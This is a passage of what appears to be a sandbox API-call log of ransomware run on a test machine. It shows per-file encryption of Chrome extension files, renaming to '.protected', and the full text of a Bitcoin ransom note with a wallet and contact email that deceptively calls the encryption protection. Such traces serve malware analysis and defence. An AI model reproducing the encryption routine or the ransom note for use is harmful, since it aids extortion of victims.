(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.485] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.485] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.485] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.485] CloseHandle (hObject=0x164) returned 1 [0079.485] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.485] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0079.485] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0079.485] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0079.485] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0079.485] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0079.485] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl") returned 142 [0079.486] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0079.486] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0079.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\*") returned 144 [0079.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.486] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.486] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.486] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.486] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.486] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\.") returned 144 [0079.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.486] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.486] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.486] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.486] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.486] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.486] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\..") returned 145 [0079.487] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.487] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.487] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.487] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.487] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.487] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.487] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.487] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.487] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json") returned 156 [0079.487] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.487] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.487] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.487] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json") returned 156 [0079.488] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json") returned 156 [0079.488] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json") returned 156 [0079.488] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.488] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10c, lpOverlapped=0x0) returned 1 [0079.489] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.489] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10c, lpOverlapped=0x0) returned 1 [0079.489] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.489] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.489] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.490] CloseHandle (hObject=0x168) returned 1 [0079.490] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.protected") returned 166 [0079.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.protected")) returned 1 [0079.491] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.491] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.491] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\RESTORE_FILES.txt") returned 160 [0079.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.491] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.491] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.493] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.493] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.494] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.494] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.494] CloseHandle (hObject=0x164) returned 1 [0079.494] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.494] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0079.494] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0079.494] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0079.494] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0079.494] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0079.494] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr") returned 142 [0079.494] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0079.494] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0079.494] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\*") returned 144 [0079.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.495] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.495] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.495] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.495] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.495] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.495] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\.") returned 144 [0079.496] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.496] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.496] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.496] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.496] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.496] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.496] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.496] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\..") returned 145 [0079.496] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.496] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.496] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.496] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.496] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.496] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.496] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.496] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.496] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json") returned 156 [0079.496] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.496] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.496] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.496] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.536] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json") returned 156 [0079.536] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.537] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json") returned 156 [0079.537] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.537] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json") returned 156 [0079.537] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.537] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x11f, lpOverlapped=0x0) returned 1 [0079.537] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.537] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x11f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x11f, lpOverlapped=0x0) returned 1 [0079.538] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.538] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.538] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.538] CloseHandle (hObject=0x168) returned 1 [0079.538] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.protected") returned 166 [0079.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.protected")) returned 1 [0079.539] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.539] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.539] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\RESTORE_FILES.txt") returned 160 [0079.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.539] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.539] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.540] lstrlenA 